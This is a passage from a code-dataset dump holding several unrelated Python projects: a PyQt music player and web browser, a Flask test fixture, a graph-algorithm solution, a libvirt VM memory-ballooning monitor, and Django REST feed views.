self.search_results.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.search_results.customContextMenuRequested.connect(self.context_menu_search)\n self.search_results.itemDoubleClicked.connect(self.add_online_song)\n\n def enter_yandex(self):\n a = EnterYandex()\n a.show()\n a.exec()\n\n def context_menu(self):\n menu = QMenu()\n download_action = QAction('Скачать')\n download_action.triggered.connect(self.download)\n menu.addAction(download_action)\n menu.exec(QtGui.QCursor.pos())\n\n def context_menu_search(self):\n menu = QMenu()\n download_action = QAction('Скачать')\n download_action.triggered.connect(self.download_search)\n menu.addAction(download_action)\n menu.exec(QtGui.QCursor.pos())\n\n def search(self):\n global client\n search_text = self.lineEdit.text()\n search_result = client.search_all(search_text, True)\n track_list = search_result[1]\n for artist in search_result[0]:\n artists_track_list = artist.get_tracks()\n track_list += artists_track_list\n self.search_results.clear()\n\n for track in track_list:\n item = QListWidgetItem(str(track) + ' — ' + track.duration)\n item.setData(256, track.id)\n self.search_results.addItem(item)\n\n def download_search(self):\n global client\n if client.is_anonymous:\n error = QMessageBox()\n error.setWindowTitle('Ошибка')\n error.setText('Вы не авторизированы')\n error.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n error.exec_()\n else:\n cur_row = self.search_results.currentRow()\n cur_track = self.search_results.item(cur_row)\n self.current_track_id = cur_track.data(256)\n track = client.track_by_id(self.current_track_id)\n track.download(f'{self.track_path}{str(track)}.mp3')\n self.fill_downloaded_tracks()\n\n def add_online_song(self, item):\n track_id = item.data(256)\n url = get_url_by_track(track_id, client)\n url = QUrl(url)\n content = QMediaContent(url)\n 
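        # Caveat: this connects play_handler to the playlist's loaded signal on every call, so in PyQt5 the slot connections stack up; presumably a single connection made once in __init__ would suffice.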
self.current_playlist.loaded.connect(self.play_handler)\n self.current_playlist.addMedia(content)\n\n def set_duration(self):\n duration = self.player.duration()\n seconds = duration // 1000\n minutes = seconds // 60\n seconds -= minutes * 60\n s_seconds = str(seconds) if seconds >= 10 else '0' + str(seconds)\n s_minutes = str(minutes) if minutes >= 10 else '0' + str(minutes)\n self.slider_label_2.setText(f'{s_minutes}:{s_seconds}')\n\n def open_file(self, item):\n track_name = item.text()\n full_file_path = os.path.join(os.getcwd(), f'tracks/{track_name}')\n url = QUrl.fromLocalFile(full_file_path)\n content = QMediaContent(url)\n self.current_playlist.loaded.connect(self.play_handler)\n self.current_playlist.addMedia(content)\n\n def play_handler(self):\n self.userAction = 1\n self.statusBar().showMessage('Playing at Volume %d' % self.player.volume())\n if self.player.state() == QMediaPlayer.StoppedState:\n if self.player.mediaStatus() == QMediaPlayer.NoMedia:\n if self.current_playlist.mediaCount() == 0:\n error = QMessageBox()\n error.setWindowTitle('Ошибка')\n error.setText('Трек не выбран')\n error.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n error.exec_()\n if self.current_playlist.mediaCount() != 0:\n self.player.setPlaylist(self.current_playlist)\n self.player.play()\n elif self.player.mediaStatus() == QMediaPlayer.LoadedMedia:\n self.player.play()\n elif self.player.mediaStatus() == QMediaPlayer.BufferedMedia:\n self.player.play()\n elif self.player.state() == QMediaPlayer.PlayingState:\n pass\n elif self.player.state() == QMediaPlayer.PausedState:\n self.player.play()\n\n def init_player(self):\n url = get_url_by_track(self.current_track_id, client)\n content = QMediaContent(QtCore.QUrl(url))\n self.player.setMedia(content)\n self.player.setVolume(50)\n self.player.play()\n\n def current_track(self, item: QListWidgetItem):\n self.current_track_id = item.data(256)\n\n def pause_handler(self):\n self.userAction = 2\n self.statusBar().showMessage('Paused at Volume %d' % (self.player.volume()))\n self.player.pause()\n\n def stop_handler(self):\n self.userAction = 0\n self.statusBar().showMessage('Stopped at Volume %d' % (self.player.volume()))\n if self.player.state() == QMediaPlayer.PlayingState:\n self.stop_state = True\n self.player.stop()\n elif self.player.state() == QMediaPlayer.PausedState:\n self.player.stop()\n elif self.player.state() == QMediaPlayer.StoppedState:\n pass\n\n def state_changed(self):\n if self.player.state() == QMediaPlayer.PausedState:\n self.player.pause()\n elif self.player.state() == QMediaPlayer.StoppedState:\n self.player.stop()\n elif self.player.state() == QMediaPlayer.PlayingState:\n self.player.play()\n\n def position_changed(self, position, sender_type=False):\n self.slider.setMaximum(self.player.duration())\n if not sender_type:\n self.slider.setValue(position)\n seconds = position // 1000\n minutes = seconds // 60\n seconds -= minutes * 60\n s_seconds = str(seconds) if seconds >= 10 else '0' + str(seconds)\n s_minutes = str(minutes) if minutes >= 10 else '0' + str(minutes)\n self.slider_label_1.setText(f'{s_minutes}:{s_seconds}')\n\n def seek_position(self, position):\n sender = self.sender()\n if isinstance(sender, QSlider):\n if self.player.isSeekable():\n self.player.setPosition(position)\n\n def volume_changed(self):\n msg = self.statusBar().currentMessage()\n msg = msg[:-2] + str(self.player.volume())\n self.statusBar().showMessage(msg)\n\n def increase_volume(self):\n vol = self.player.volume()\n vol = min(vol + 5, 100)\n 
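        # the clamp above keeps the value inside QMediaPlayer's valid 0-100 volume range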
self.player.setVolume(vol)\n\n def decrease_volume(self):\n vol = self.player.volume()\n vol = max(vol - 5, 0)\n self.player.setVolume(vol)\n\n def download(self):\n global client\n if client.is_anonymous:\n error = QMessageBox()\n error.setWindowTitle('Ошибка')\n error.setText('Вы не авторизированы')\n error.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n error.exec_()\n else:\n cur_row = self.playlist_window.currentRow()\n cur_track = self.playlist_window.item(cur_row)\n self.current_track_id = cur_track.data(256)\n track = client.track_by_id(self.current_track_id)\n track.download(f'{self.track_path}{str(track)}.mp3')\n self.fill_downloaded_tracks()\n\n def fill_downloaded_tracks(self):\n self.downloaded_tracks.clear()\n list_downloaded_tracks = os.listdir(self.track_path)\n for track in list_downloaded_tracks:\n item = QListWidgetItem(str(track))\n self.downloaded_tracks.addItem(item)\n\n def prevItemPlaylist(self):\n self.player.playlist().previous()\n\n def nextItemPlaylist(self):\n self.player.playlist().next()\n\n def exit_action(self):\n exit_ac = QAction('&Exit', self)\n exit_ac.setStatusTip('Exit App')\n exit_ac.triggered.connect(self.closeEvent)\n return exit_ac\n\n def closeEvent(self, event):\n reply = QMessageBox.question(self, 'Message', 'Вы уверены, что хотите выйти?', QMessageBox.Yes | QMessageBox.No,\n QMessageBox.Yes)\n\n if reply == QMessageBox.Yes:\n QCoreApplication.quit()\n else:\n try:\n event.ignore()\n except AttributeError:\n pass\n\n\nclass EnterYandex(QDialog, Yam_Dialog):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pushButton.clicked.connect(self.enter)\n\n def enter(self):\n global client\n login = self.login_yan.text()\n password = self.pass_yan.text()\n client = ya.YandexClient((login, password))\n if client.is_anonymous:\n error = QMessageBox()\n error.setWindowTitle('Ошибка')\n error.setText('Неверно введен логин или пароль')\n error.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n error.exec_()\n else:\n self.close()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MainWindow()\n ex.show()\n sys.exit(app.exec_())\n","repo_name":"tsukikomiata/player_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29419173639","text":"number_one = int(input('Enter the first number:'))\nnumber_two = int(input('Enter the second number:'))\ndiv, sum1, sum2 = 1,0,0\nwhile div <= number_one / 2:\n if number_one % div == 0:\n sum1 += div\n div += 1\ndiv = 1 # let's return the divisor to 1\nwhile div <= number_two / 2:\n if number_two% div == 0:\n sum2 += div\n div += 1\nif sum1 == number_two and sum2 == number_one:\n print ('The numbers are friendly!')\nelse:\n print ('The numbers are not friendly!')","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_ej2/tema2_ej2_51eded65d06968f25bd4934da46ad8bb.py","file_name":"tema2_ej2_51eded65d06968f25bd4934da46ad8bb.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74061813369","text":"import os\nimport unittest\n\nfrom app import app, db\nfrom app.models import User, Idea, Vote\nfrom app.models.event import Event, EventType\nfrom app.models.user import UserRole\n\n\nclass BaseTestCase(unittest.TestCase):\n testAdmin = None\n testUser = None\n testIdea = None\n testVote = None\n testEvent = None\n\n def 
setUp(self):\n self.db = db\n basedir = os.path.abspath(os.path.dirname(__file__))\n app.config['SQLALCHEMY_DATABASE_URI'] = \\\n 'sqlite:///' + os.path.join(basedir, 'test.db')\n self.app = app.test_client()\n self.db.create_all()\n self.setTestAdmin()\n self.setTestUser()\n self.setTestIdea()\n self.setTestVote()\n self.setTestEvent()\n\n def tearDown(self):\n self.db.session.remove()\n self.db.drop_all()\n\n def addModel(self, user):\n self.db.session.add(user)\n self.db.session.commit()\n\n def addTestModels(self):\n self.addModel(self.testAdmin)\n self.addModel(self.testUser)\n self.testIdea.user_id = self.testUser.id\n self.addModel(self.testIdea)\n self.testVote.idea_id = self.testIdea.id\n self.testVote.user_id = self.testUser.id\n self.addModel(self.testVote)\n self.testEvent.user_id = self.testUser.id\n self.addModel(self.testEvent)\n\n def setTestAdmin(self):\n self.testAdmin = User()\n self.testAdmin.username = 'admin'\n self.testAdmin.email = 'admin@ideahub.com'\n self.testAdmin.role = UserRole.admin\n self.testAdmin.set_password('123456')\n self.testAdmin.generate_auth_token()\n\n def setTestUser(self):\n self.testUser = User()\n self.testUser.username = 'john'\n self.testUser.name = 'John'\n self.testUser.surname = 'Doe'\n self.testUser.email = 'john@mail.com'\n self.testUser.tags = 'web development, csse'\n self.testUser.set_password('123456')\n self.testUser.generate_auth_token()\n\n def setTestIdea(self):\n self.testIdea = Idea()\n self.testIdea.title = 'My Awesome Test Idea'\n self.testIdea.description = 'Description of an Awesome Test Idea'\n self.testIdea.category = 'Engineering'\n self.testIdea.tags = self.testUser.tags\n\n def setTestVote(self):\n self.testVote = Vote()\n self.testVote.value = 1\n\n def setTestEvent(self):\n self.testEvent = Event()\n self.testEvent.type = EventType.votes\n self.testEvent.idea_name = self.testIdea.title\n self.testEvent.data = 10\n","repo_name":"boceckts/ideahub","sub_path":"test/base_test_case.py","file_name":"base_test_case.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26720396051","text":"import sys\nimport PyQt5\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtWebEngineWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtPrintSupport import *\n\nimport os\nimport sys\n\n# Please Install This Packages pip install PyQtWebEngine\n# pip install PyQt5\n# Uttkarsh_Pandey\n# Yash_OP\n# Integrity\n# AlwaysBees\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.browser = QWebEngineView()\n self.browser.setUrl(QUrl('https://www.bing.com/?toWww=1&redig=375257EAD25C4BF5AA82551D2405763A'))\n self.setCentralWidget(self.browser)\n self.showMaximized()\n file_menu = self.menuBar().addMenu(\"&File\")\n\n save_file_action = QAction(QIcon(os.path.join('images', 'disk--pencil.png')), \"Save Page As...\", self)\n save_file_action.setStatusTip(\"Save current page to file\")\n save_file_action.triggered.connect(self.save_file)\n file_menu.addAction(save_file_action)\n\n # navbar\n navbar = QToolBar()\n self.addToolBar(navbar)\n\n navbar2 = QToolBar()\n self.addToolBar(navbar2)\n\n back_btn = QAction('Back', self)\n back_btn.triggered.connect(self.browser.back)\n navbar.addAction(back_btn)\n\n forward_btn = QAction('Forward', self)\n forward_btn.triggered.connect(self.browser.forward)\n navbar.addAction(forward_btn)\n\n reload_btn = QAction('Reload', self)\n 
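        # Each toolbar button follows the same pattern: create a QAction, wire its triggered signal to a slot, then register it with addAction().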
reload_btn.triggered.connect(self.browser.reload)\n navbar.addAction(reload_btn)\n\n home_btn = QAction('Home', self)\n home_btn.triggered.connect(self.navigate_home)\n navbar.addAction(home_btn)\n\n self.url_bar = QLineEdit()\n self.url_bar.returnPressed.connect(self.navigate_to_url)\n navbar.addWidget(self.url_bar)\n\n self.browser.urlChanged.connect(self.update_url)\n# ========================================================================================================================\n # navbar2\n tab1 = QAction('Main', self)\n tab1.triggered.connect(self.main_tab1)\n navbar2.addAction(tab1)\n tab2 = QAction('Incognito', self)\n tab2.triggered.connect(self.main_tab2)\n navbar2.addAction(tab2)\n main3 = QAction('Google', self)\n main3.triggered.connect(self.main_tab3)\n navbar2.addAction(main3)\n main4 = QAction('Yandex', self)\n main4.triggered.connect(self.main_tab4)\n navbar2.addAction(main4)\n main5 = QAction('Yahoo', self)\n main5.triggered.connect(self.main_tab5)\n navbar2.addAction(main5)\n new_btn = QAction('Brave', self)\n new_btn.triggered.connect(self.navigate_tab)\n navbar2.addAction(new_btn)\n# =========================================================================================================================\n new_btn1 = QAction('TicTacToe', self)\n new_btn1.triggered.connect(self.navigate_tab1)\n navbar2.addAction(new_btn1)\n aboutproject1 = QAction('AboutOurProject', self)\n aboutproject1.triggered.connect(self.aboutproject)\n navbar2.addAction(aboutproject1)\n ninjagame = QAction('Knife Master', self)\n ninjagame.triggered.connect(self.ninjagamebtn)\n navbar2.addAction(ninjagame)\n bullseye = QAction('Bow Master', self)\n bullseye.triggered.connect(self.bullseyef)\n navbar2.addAction(bullseye)\n flipgame = QAction('Flip Game', self)\n flipgame.triggered.connect(self.flipgamef)\n navbar2.addAction(flipgame)\n rimage = QAction('RandomImage', self)\n rimage.triggered.connect(self.randomimagef)\n navbar2.addAction(rimage)\n# =========================================================================================================================\n#functions\n def navigate_home(self):\n self.browser.setUrl(QUrl('http://yash.brizy.site'))\n def navigate_tab(self):\n self.browser.setUrl(QUrl('https://seach.brave.com'))\n def navigate_tab1(self):\n self.browser.setUrl(QUrl('https://bit.ly/tictactoeop'))\n def main_tab1(self):\n self.browser.setUrl(QUrl('https://www.bing.com/?toWww=1&redig=94F4AABD4CB34B349328F5A428C42C5E'))\n def main_tab2(self):\n self.browser.setUrl(QUrl('https://duckduckgo.com'))\n def main_tab3(self):\n self.browser.setUrl(QUrl('https://google.com'))\n def main_tab4(self):\n self.browser.setUrl(QUrl('https://yandex.com/'))\n def main_tab5(self):\n self.browser.setUrl(QUrl('https://in.search.yahoo.com/?fr2=inr'))\n def aboutproject(self):\n self.browser.setUrl(QUrl('https://bit.ly/aboutinegrity'))\n def ninjagamebtn(self):\n self.browser.setUrl(QUrl('https://bit.ly/ninjagamebtn'))\n def bullseyef(self):\n self.browser.setUrl(QUrl('https://bit.ly/bullseyegameop'))\n def flipgamef(self):\n self.browser.setUrl(QUrl('https://bit.ly/flipgameop'))\n def randomimagef(self):\n self.browser.setUrl(QUrl('https://bit.ly/randomimagebyyash'))\n\n# ====================================================================================================================\n\n def update_url(self, q):\n self.url_bar.setText(q.toString())\n\n def navigate_to_url(self):\n url = self.url_bar.text()\n self.browser.setUrl(QUrl(url))\n def open_file(self):\n filename, _ = 
QFileDialog.getOpenFileName(self, \"Open file\", \"\",\n                                                  \"Hypertext Markup Language (*.htm *.html);;\"\n                                                  \"All files (*.*)\")\n\n        if filename:\n            with open(filename, 'r') as f:\n                html = f.read()\n\n            self.tabs.currentWidget().setHtml(html)\n            self.urlbar.setText(filename)\n\n    def save_file(self):\n        filename, _ = QFileDialog.getSaveFileName(self, \"Save Page As\", \"\",\n                                                  \"Hypertext Markup Language (*.htm *.html);;\"\n                                                  \"All files (*.*)\")\n\n        if filename:\n            html = self.tabs.currentWidget().page().toHtml()\n            with open(filename, 'w') as f:\n                f.write(html)\n# =================================================================================================================\napp = QApplication(sys.argv)\nQApplication.setApplicationName('Integrity Browser')\nwindow = MainWindow()\napp.exec_()\n","repo_name":"Eternity-ad/Eternity-Browser","sub_path":"v0.70.3.py","file_name":"v0.70.3.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"45597656725","text":"from heapq import heappop, heappush\n\ndef solution(N, road, K):\n    distances=[float('inf')]*N\n    \n    graph=[[] for _ in range(N)]\n    \n    for s,e,c in road:\n        graph[s-1].append([c,e-1])\n        graph[e-1].append([c,s-1])\n    \n    q=[[0,0]]\n    distances[0]=0\n    while q:\n        travel,now=heappop(q)\n        \n        if travel>distances[now]:\n            continue\n        \n        for distance,next in graph[now]:\n            if distance+travel 
expansion_thresh*guest.currentmem and guest.currentActualmem < guest.maxmem:\n                needy[uuid] = min(0.1*guest.maxmem,guest.maxmem-guest.currentActualmem)\n                guest.log(\"Is needy, need: %dMB\", needy[uuid])\n                extraMemory += needy[uuid]\n                # needy guests do not have idle memory\n                softIdle[uuid] = 0\n                hardIdle[uuid] = 0\n            guest.log('Soft Idle is %dMB', softIdle[uuid])\n            guest.log('Hard Idle is %dMB', hardIdle[uuid])\n            softIdleMemory += softIdle[uuid]\n            hardIdleMemory += hardIdle[uuid]\n        except:\n            errorlogger.exception('Unable to monitor guest name: %s, uuid: %s ',guest.domName, uuid)\n\n    debuglogger.debug(\"Total soft idle memory: %dMB\", softIdleMemory)\n    debuglogger.debug(\"Total hard idle memory: %dMB\", hardIdleMemory)\n    debuglogger.debug(\"Extra Memory Required: %dMB\", extraMemory)\n    # Monitor the host\n    try:\n        # Idle Memory should be subtracted from guest used memory.\n        # i.e. It should not count towards host load.\n        # The result of this is that a host is only migrated when its\n        # requirements cannot be satisfied after hard ballooning of all the other guests.\n        host.monitor(softIdleMemory + hardIdleMemory, stealTime)\n        # This will try to migrate away guests if there is an overload\n    except Exception as e:\n        errorlogger.exception('Unable to monitor host')\n\n    # Pot represents the amount of memory freely available to give away.\n    pot = calculatePot(host, softIdleMemory + hardIdleMemory)\n    # If 90% of the available memory is used, reclaim some memory\n    # This is required to prevent swapping\n    # TODO: use hard idle too here\n    if pot < 0.1*(host.totalmem - host.hypervisorLoad):\n        while pot < 0.2*(host.totalmem - host.hypervisorLoad) and len(softIdle.keys()) > 0:\n            idleUuid = softIdle.keys()[0]\n            softIdleGuest = guests[idleUuid]\n            softIdleGuestMem = softIdle[idleUuid]\n            softIdleGuest.balloon(softIdleGuest.currentActualmem - softIdleGuestMem)\n            pot += softIdleGuestMem\n            del softIdle[idleUuid]\n\n    # If demands can be satisfied by soft reclamation\n    if host.loadmem + hardIdleMemory + extraMemory <= host.totalmem:\n        debuglogger.debug(\"Demands can be satisfied by soft reclamation\")\n        #pot = calculatePot(host, softIdleMemory + hardIdleMemory)\n        for uuid in needy.keys():\n            needyGuest = guests[uuid]\n            need = needy[uuid]\n            while pot < need and len(softIdle.keys()) > 0:\n                idleUuid = softIdle.keys()[0]\n                softIdleGuest = guests[idleUuid]\n                softIdleGuestMem = softIdle[idleUuid]\n                softIdleGuest.balloon(softIdleGuest.currentActualmem - softIdleGuestMem)\n                pot += softIdleGuestMem\n                del softIdle[idleUuid]\n            if(pot-need < -100):\n                errorlogger.warn(\"More than 100MB deficit in pot. check the algo.\")\n            else:\n                needyGuest.balloon(needyGuest.currentActualmem + need )\n                pot -= need\n\n    # If hard reclamation required\n    elif host.loadmem + extraMemory < host.totalmem:\n        debuglogger.debug(\"Demands need hard reclamation\")\n        # pot represents the memory free to give away without ballooning\n        # more memory can be added to pot by ballooning down any guest\n        # ballooning up a guest takes away memory from the pot\n        #pot = calculatePot(host, softIdleMemory + hardIdleMemory)\n        needAfterSoft = extraMemory - softIdleMemory\n        # take away proportional amount of memory from each idle guest\n        for uuid in needy.keys():\n            needyGuest = guests[uuid]\n            need = needy[uuid]\n            while pot < need and len(softIdle.keys()) > 0:\n                idleUuid = softIdle.keys()[0]\n                idleGuest = guests[idleUuid]\n                softIdleGuestMem = softIdle[idleUuid]\n                hardIdleGuestMem = hardIdle[idleUuid]\n                hardReclaim = (hardIdleGuestMem*needAfterSoft)/hardIdleMemory\n                if hardReclaim > 0:\n                    idleGuest.balloon(idleGuest.usedmem - hardReclaim)\n                elif softIdleGuestMem > 0:\n                    idleGuest.balloon(idleGuest.currentActualmem - softIdleGuestMem)\n                pot += softIdleGuestMem + hardReclaim\n                del softIdle[idleUuid]\n                del hardIdle[idleUuid]\n            if(pot-need < -100):\n                errorlogger.warn(\"More than 100MB deficit in pot. check the algo.\")\n            else:\n                needyGuest.balloon(needyGuest.currentActualmem + need)\n                pot -= need\n    # If not enough memory is left to give away\n    else:\n        debuglogger.debug(\"Overload, calculate entitlement\")\n        # calculate the entitlement of each guest\n        idleMemory = 0\n        idle = {}\n        excessMemory = 0\n        excessUsed = {}\n        excessUsedMemory = 0\n        for uuid in guests.keys():\n            guest = guests[uuid]\n            entitlement = (guest.maxmem*host.totalmem)/totalGuestMemory\n            if entitlement < guest_reserved:\n                guest.log(\"Entitlement less than reserved: %dMB\", entitlement)\n                #TODO: next line is wrong. Fix it.\n                #The intent is that if entitlement is less than reserved,\n                # the extra amount should be given from other VM's entitlement.\n                # Below implementation may work, but is wrong\n                totalGuestMemory -= (guest_reserved - entitlement)\n                entitlement = guest_reserved\n            guest.log(\"Entitlement: %dMB\", entitlement)\n            if (uuid in needy.keys()) and guest.currentActualmem < entitlement:\n                needy[uuid] = entitlement - guest.currentActualmem\n                extraMemory += entitlement - guest.currentActualmem\n            elif uuid in needy.keys():\n                del needy[uuid]\n                idle[uuid] = calculateSoftIdle(guest) + calculateHardIdle(guest)\n                idleMemory += idle[uuid]\n                excessUsed[uuid] = max(guest.currentActualmem - idle[uuid] - entitlement, 0)\n                excessUsedMemory = excessUsedMemory + excessUsed[uuid]\n            else:\n                idle[uuid] = 0\n                if uuid in softIdle.keys():\n                    idle[uuid] = idle[uuid] + softIdle[uuid]\n                if uuid in hardIdle.keys():\n                    idle[uuid] = idle[uuid] + hardIdle[uuid]\n                idleMemory += idle[uuid]\n                excessUsed[uuid] = max(guest.currentActualmem - idle[uuid] - entitlement, 0)\n                excessUsedMemory = excessUsedMemory + excessUsed[uuid]\n        #pot = calculatePot(host, idleMemory)\n        needAfterIdle = extraMemory - idleMemory\n        for needyUuid in needy.keys():\n            needyGuest = guests[needyUuid]\n            need = needy[needyUuid]\n            while pot < need and len(idle.keys()) > 0:\n                excessUuid = idle.keys()[0]\n                excessGuest = guests[excessUuid]\n                usedReclaim = excessUsed[excessUuid]\n                idleReclaim = idle[excessUuid]\n                usedReclaim = (excessUsed[excessUuid]*needAfterIdle)/excessUsedMemory\n                excessGuest.balloon(excessGuest.loadmem - usedReclaim)\n                pot += idleReclaim + usedReclaim\n                del idle[excessUuid]\n                del excessUsed[excessUuid]\n            if(pot-need < -100):\n                errorlogger.warn(\"More than 100MB deficit in pot. check the algo.\")\n            else:\n                needyGuest.balloon(needyGuest.currentActualmem + need)\n                pot -= need\n\ndef sendLog():\n    global hostLog\n    global guestLog\n    if config.getboolean('influx','enabled'):\n        db = config.get('influx','db')\n        ihost = config.get('influx','host')\n        payload = \"\"\n        for key in hostLog.keys():\n            payload = payload + (key+',host='+hostname+' value='+str(hostLog[key])+'\n')\n        for guest in guestLog.keys():\n            stat = guestLog[guest]\n            for key in stat.keys():\n                payload = payload + (key+',guest='+guest+',host='+hostname+' value='+str(stat[key])+'\n')\n            # this metric is used to track migration\n            n = hostname[-1:]\n            try:\n                n = int(n)\n            except:\n                n = ord(n)\n            payload = payload + ('host,guest='+guest+' value='+str(n)+'\n')\n        # add self monitoring metrics\n        meminfo = selfProcess.get_memory_info()\n        payload = payload + ('selfRss,host='+hostname+' value='+str(meminfo.rss/(1024*1024))+'\n')\n        payload = payload + ('selfVms,host='+hostname+' value='+str(meminfo.vms/(1024*1024))+'\n')\n        payload = payload + ('selfCpu,host='+hostname+' value='+str(selfProcess.get_cpu_percent(interval=None))+'\n')\n        resp = requests.post('http://'+ihost+'/write?db='+db, data=payload)\n        if resp.status_code != 204:\n            debuglogger.warn('Unable to send request to influx db %s', resp.content)\n    hostLog.clear()\n    guestLog.clear()\n\ndef reclaimForMigration():\n    global hostname\n    global guests\n    global etcdClient\n    global host\n    toReclaim = float(etcdClient.read('/' + hostname + '/reclaim').value)\n    if toReclaim <= 0:\n        return\n    totalSoftIdle = 0\n    totalHardIdle = 0\n    softIdle = {}\n    hardIdle = {}\n    for uuid in guests.keys():\n        softIdle[uuid] = calculateSoftIdle(guests[uuid])\n        hardIdle[uuid] = calculateHardIdle(guests[uuid])\n        totalSoftIdle = totalSoftIdle + softIdle[uuid]\n        totalHardIdle = totalHardIdle + hardIdle[uuid]\n    pot = calculatePot(host, totalSoftIdle + totalHardIdle)\n    toReclaim = toReclaim - pot\n    while toReclaim > 0 and len(softIdle) > 0:\n        idleUuid = softIdle.keys()[0]\n        softIdleGuest = guests[idleUuid]\n        softIdleGuestMem = softIdle[idleUuid]\n        softIdleGuest.balloon(softIdleGuest.currentActualmem - softIdleGuestMem)\n        toReclaim = toReclaim - softIdleGuestMem\n        del softIdle[idleUuid]\n    while toReclaim > 0 and len(hardIdle) > 0:\n        idleUuid = hardIdle.keys()[0]\n        hardIdleGuest = guests[idleUuid]\n        hardIdleGuestMem = hardIdle[idleUuid]\n        hardIdleGuest.balloon(hardIdleGuest.usedmem - hardIdleGuestMem)\n        toReclaim = toReclaim - hardIdleGuestMem\n        del hardIdle[idleUuid]\n    etcdClient.write('/'+hostname+'/reclaim', toReclaim)\n\n\n\ndef main():\n    global config\n    global host\n    global guests\n    global cpuCores\n    global etcdClient\n    # Set up logger\n    #logging.basicConfig(filename='monitor.log',format='%(asctime)s: %(levelname)8s: %(message)s', level=logging.DEBUG)\n    debuglogger.info('Monitoring started!')\n\n    # check if root\n    if os.geteuid() != 0:\n        errorlogger.error('Root permission required to run the script! Exiting.')\n        sys.exit(1)\n\n    # connect to the hypervisor\n    try:\n        conn = libvirt.open('qemu:///system')\n    except Exception as e:\n        errorlogger.exception('Failed to open connection to the hypervisor, Exiting')\n        sys.exit(1)\n\n    if conn == None:\n        errorlogger.error('Failed to open connection to the hypervisor, Exiting')\n        sys.exit(1)\n\n    # get the list of all domains managed by the hypervisor\n    try:\n        doms = conn.listAllDomains()\n    except Exception as e:\n        errorlogger.exception('Failed to find the domains, Exiting')\n        sys.exit(1)\n\n    # start the event loop\n    try:\n        virEventLoopNativeStart()\n        debuglogger.info(\"libvirt event loop started\")\n    except Exception as e:\n        errorlogger.exception('Failed to start libvirt event loop, Exiting')\n        sys.exit(1)\n    # register callbacks for domain startup events\n    try:\n        conn.domainEventRegisterAny(None, libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE, domainLifecycleCallback, None)\n        debuglogger.info(\"libvirt domain lifecycle callbacks registered\")\n    except Exception as e:\n        errorlogger.exception('Failed to register domain lifecycle events, Exiting')\n\n    cpuCores = conn.getCPUMap(0)[0]\n    host = Host(conn)\n    etcdClient.write('/'+hostname+'/reclaim', 0)\n    for domain in doms:\n        if domain.isActive():\n            addNewDomain(domain)\n\n    # Main monitoring loop\n    while True:\n        try:\n            debuglogger.info(\"****Starting new round of monitoring***\")\n            monitor()\n        except Exception as e:\n            errorlogger.exception('An exception occurred in monitoring')\n        sendLog()\n        t = 0\n        while t < config.getint('monitor', 'time'):\n            try:\n                reclaimForMigration()\n            except Exception as e:\n                errorlogger.exception('An exception occurred in reclaimForMigration')\n            time.sleep(2)\n            t +=2\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"shivanshuag/thesis-code","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":17255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"16918700477","text":"from django.db.models import Prefetch\nfrom django.db.models.query import QuerySet\nfrom django.shortcuts import get_object_or_404\n\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_200_OK\nfrom rest_framework.generics import ListAPIView\nfrom rest_framework.views import APIView\n\nfrom comments.models import Comment\nfrom comments.serializers import CommentSerializer\nfrom .serializers import BaseFeedSerializer\nfrom .models import Feed\n\n\nclass CommentListAPIView(ListAPIView):\n\n    queryset = Comment.objects.all()\n    serializer_class = CommentSerializer\n\n    def get_queryset(self) -> QuerySet:\n        queryset = super().get_queryset()\n        feed_pk = self.kwargs.get(\"pk\", None)\n        feed = get_object_or_404(Feed, pk=feed_pk)\n        replies_qs: Prefetch = Prefetch(\n            \"replies\",\n            Comment.objects.select_related(\n                \"user\", \"root\", \"parent\", \"feed\"\n            ).prefetch_related(\"likes__user\"),\n        )\n        comment_likes_qs: str = \"likes__user\"\n\n        joined_queryset: QuerySet = queryset.select_related(\n            \"feed\", \"root\", \"user\"\n        ).prefetch_related(comment_likes_qs, replies_qs)\n\n        filtered_queryset: QuerySet = joined_queryset.filter(\n            feed=feed, root=None\n        ).cache()\n        return filtered_queryset\n\n\nclass BaseFeedListView(ListAPIView):\n\n    queryset = Feed.objects.select_related(\"user\").prefetch_related(\"likes__user\")\n    serializer_class = BaseFeedSerializer\n    permission_classes = [IsAuthenticated]\n\n\nclass PopularFeedListView(BaseFeedListView):\n    def 
